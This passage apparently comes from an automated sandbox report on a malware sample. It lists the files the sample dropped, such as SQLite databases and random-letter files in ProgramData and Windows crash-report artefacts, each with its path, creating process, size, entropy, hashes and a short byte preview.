                                                                                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\IZMFBFKMEB.xlsx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.695566741548326
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:61iSJC9lUfmxZoTgwj7WkGrivJpQ4t468phJvvHIm:6M/lU+x27HleIQ4t4bHIm
                                                                                                                                                                                                                                                                                                                                                                MD5:CA699715DA51DFD5AB81CDA02AFD2CD7
                                                                                                                                                                                                                                                                                                                                                                SHA1:72D44C17A04FAB316BEA20F61A80D7AC787879D4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:BA61F500E1845F2FC03C990DA95B7DD92ED8B7583744C941D37BDD90DA666D21
                                                                                                                                                                                                                                                                                                                                                                SHA-512:497F9D6B6EE52454F4B740A6B765F46EBC10575E9A20B62D76594E1CC4E37868182D18315E05E62A78D5131A5569C95C8989F248E3A8C72BD95A99883DF196D2
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:IZMFBFKMEBTITTFFYOGRJOKLUYKYEMJURKRTIEUFEDJKBQPELZNUOXWVNDZJRAOONFPZIJHBCSQXWTLQPDNPIJFFQZDETQFKNDQYRTMSHJIWQXJBNOXAVBJCARKFOKHIBUFVCEOHZTISPCFZSEFFASUHHMDHUBAMSDTGESWVKGUMZNYRLTUEBNLLDQOMZLGIFYUADUMCNGQHUWJKQAWHNDDSWUDEYOPPNFAUERMDDQUABWZCHPIWYDNDHUXDNYSLQSQXHUJRCQMGRZMRHEOVRBHVMIEIIBHEADKNABKWVMULXGOWXFOLUTZDUOKAMBBJKEPASVGVTDOUQMBCJGMPZZSAVFTSOBTVJPGYYQSJQWHRBFXNUHYKYXWZSTJELLKRMBHUVLFEPITLTURHTDAKMVDVNYWADPMNSQACTPRPTZDAYSYQHCRSDUXMKTYASRROVGGBBIXHTORYFNKLOIBCKWHWPTJGKEQOSVXTUUTFZVORIRTKYSUWDEDDGTJHWLZYRYCPYUENHHDNRWCVEAZUDOXSWLHJDIGSALQSCJKGZEXAIJUDAQHXCOAVPDFCQIEHQEFVSBLKSKPDHYCYSPHGVTEDVHAWYWOOWFAJSTOXLDYSHUWZIJQGRICKYUZPXLOZURIDFCEWXUMATNYLUVJTEOTDEYCCRPCVBPHMOLWESOWCICFDWLNMYIPCOLYFBDDSRCSOZZCSIWGDPTAXMSUSNBSGLDTYGEEBZGXKIVMAHAMBSJEUPRTVXERTMYQWIYUTCCWNXDLXQQSMSGHDXMIYKWUXJBHOCOBAEVHTWJOZVUWZIGVYBPSQGRQDABKLPWJJRURTHDJAMMOZSJFGCHHDVYXDYYIUIOZDZJWQLIKTEKOTISNTJFMZOMVLIYUHJEAMEKRMBWXHAYWZVDUJKHILQWXCRKUPFLJKIKWARBWYUOFDHFXEHJWSBCSSQMNJANADKJFCPMBCMQGQXNUCZETZWJFUFSMVAZQXHOGKPFDO

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\JEHJKJEBGHJJKEBGIECAAFIJKJ

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\KECBGCGCGIEGCBFHIIEB

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\KKJKFBKKECFHJKEBKEHIDAEBKF

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\MXPXCVPDVN.docx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.698669844484375
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
                                                                                                                                                                                                                                                                                                                                                                MD5:4FCF725C73B93BE52C2E1CD48AC3A562
                                                                                                                                                                                                                                                                                                                                                                SHA1:98118BDED7CC2397C19310A914C6CA6B39CC47DE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_FE8B.exe_31df26830abf740b1ca9b29b8cedb2bcff4172c_c8fd694f_b9268015-9f0a-412a-bfdb-2ac2b3833393\Report.wer

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8948664499001592
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:0ozuFzsmcpEscB+trmUfbQXIDcQzc6rcEqcw3Mn+HbHgEotuuzOyu8KazWkbO+k8:mWmcpE0u0Nvw4sjTfAzuiFOZ24IO8+
                                                                                                                                                                                                                                                                                                                                                                MD5:AC03673864E3D8F1166E362B0E2ECC4D
                                                                                                                                                                                                                                                                                                                                                                SHA1:3037CA0F1E6400AE6E3667A7290C7AAD48EAC581
                                                                                                                                                                                                                                                                                                                                                                SHA-256:335AA1D3C1EE215531BD362CB25930BD89D7EAFF8362F4D201C3CFC009997D50
                                                                                                                                                                                                                                                                                                                                                                SHA-512:92916302BF78207BB933CA2B2D2B695D5AB745583116AB5EC3538E53532852FF1C4E6210E915E98AE570A3DDBBAF419BA2AEC83F0D5EAF24D27607EFB762FA62
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.1.6.0.5.1.5.2.7.5.8.1.8.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.1.6.0.5.1.5.5.3.9.8.8.0.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.2.6.8.0.1.5.-.9.f.0.a.-.4.1.2.a.-.b.f.d.b.-.2.a.c.2.b.3.8.3.3.3.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.a.5.5.5.9.5.-.7.f.0.e.-.4.3.9.5.-.b.f.4.1.-.3.d.7.a.c.2.a.1.4.7.0.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.E.8.B...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.h.i.l.k.a.t.U.t.i.l...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.1.-.0.0.1.5.-.0.9.2.4.-.e.0.2.f.2.4.5.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.0.a.b.5.5.e.a.e.e.7.8.7.8.a.c.7.a.6.d.b.8.c.3.7.8.1.9.8.9.2.0.0.0.0.0.9.0.4.!.0.0.0.0.0.f.5.1.8.3.b.2.a.4.0.1.6.9.7.5.5.e.a.d.e.4.f.f.4.5.3.5.4.e.8.f.c.c.3.c.f.7.

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F11.tmp.dmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Mon Feb 5 11:12:33 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):99308
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.1137733404339083
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:YdVIoqnvBv+Ju4y/yWtKl0A+2VGb0FkXz+JCsC7fQPMV3pEEOpo/Y4Ioy8fg97aN:YdWtnvBmw7KSY0P4GbykD+lPMVFF
                                                                                                                                                                                                                                                                                                                                                                MD5:FBDF22433FB71BE239F178DD2551D425
                                                                                                                                                                                                                                                                                                                                                                SHA1:8D77D876D430A474E3F4AC48344B25A9ABF5974F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:431CD40C26A052D5D16D5744B80B2A5DDEB5A4B4658F6C72D1DE4C570E495CB2
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5395D1F3DCB00606012C63B77C4D43E73DF19BB65C7C35DA6E4507D0F8BD2DA98319DEFC28535E9BB2AC607EB9BA67DEE8EE78AEE6D35AA62273A90B846C25DB
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:MDMP..a..... ..........e............T...............h.......<...$...........@8..........`.......8...........T...........87...L..........`...........L...............................................................................eJ..............GenuineIntel............T..............e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER326D.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):8312
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6945987798838513
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJen6Td6Y2DlSUNBgmfL5HQvprx89b1Lsf+nm:R6lXJ26p6YoSUNBgmfLpb1Qff
                                                                                                                                                                                                                                                                                                                                                                MD5:E48DD894049B99E935BCB647D178ED03
                                                                                                                                                                                                                                                                                                                                                                SHA1:DBD8986429355FF1E6257ABA4ED048AF83B54126
                                                                                                                                                                                                                                                                                                                                                                SHA-256:6A05C2A1570F0C5BD724A3C9C1FF7EFA04DEE370B289C57174C6593ADCA58281
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4C36C32B56CC81E32B0DB3C80DA503971C192DF917E4CB3288CDBB884230698980B8EBBDD01B81AA0D394CC978A1A0E1DE6A879855BFC346760987E2320825A2
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3618.tmp.xml

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4626
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.451051076961632
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsQJg77aI9IimWpW8VYgzYm8M4J0lBmEF1+q8iVBQqfieHzmd:uIjfWI7Win7VEJ0lfVV5fPHzmd
                                                                                                                                                                                                                                                                                                                                                                MD5:B5379AA2E7BB0DD0A27EE4123419C35B
                                                                                                                                                                                                                                                                                                                                                                SHA1:7BB6AC2460F0105118C5B8ADE6D5CF5A2D1E415D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F04A28BD4B9E11AAD7AA7884468C95C85441DD5740D2D81E22AC49CC42AF58EC
                                                                                                                                                                                                                                                                                                                                                                SHA-512:777AD6023E57C3CA4CB6838B2528591E94AE064428609D3C0A6C91D5B9C4AAF7487C766A9A7C188F1BC6B27E49F73694B96B5B9931ADD0F6B13D7D160FCD2D8A
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="180135" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3664.tmp.csv

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):89004
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.0963694369421333
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:Tojz5WFC/8lCZXmQQa+JOtGQVxDFhCcIn/kOW1vlpxTwzm82:Tojz5WFC/8lCZXmQQlJOtGQVxDFhCcIc
                                                                                                                                                                                                                                                                                                                                                                MD5:EA9E3ED6CE792791D9A7A29A0A0F841B
                                                                                                                                                                                                                                                                                                                                                                SHA1:ADDA438799749C925DACE2E46E619E64B5F8E1E0
                                                                                                                                                                                                                                                                                                                                                                SHA-256:D7E7B4483CAE57C9AD80C6EACC5A352021F0946CEA98DBDEA2CA29F24F66B68D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:44C3D5854FAF27FE371E990EC6C2C104CC607714F269F5AAE1772B3A0839BAC524BE4FA1C0DB99AFBED637FDD8E6EFF192C08BE9C7D83418E20DFD1CFC7E0340
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3878.tmp.txt

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.685002178413773
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:TiZYWbzQpIaMTtYEYf7WPHcUYEZeZtFi/BM+Jr0wOkKU4caGiS6MacJIBd3:2ZDbzpzGiQiaGiS6Mac2Bd3
                                                                                                                                                                                                                                                                                                                                                                MD5:DE1C0F667BF632ED6BF2A1DE12E0A9CA
                                                                                                                                                                                                                                                                                                                                                                SHA1:D75D404A5E5193DAD9647C80A792B70531DDBA55
                                                                                                                                                                                                                                                                                                                                                                SHA-256:C320A38BAB906CAEE295BBBE44915C033196AEA0349B0F6B2B8191A8D15BA6CB
                                                                                                                                                                                                                                                                                                                                                                SHA-512:6554F12F291399A9484E4C18406B424D1926324070F98700863EE4A3A7205B5BAC70E80BCACE21844E61084D2CB2895EA25BFE1038C911E16BA945E240BD1A97
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
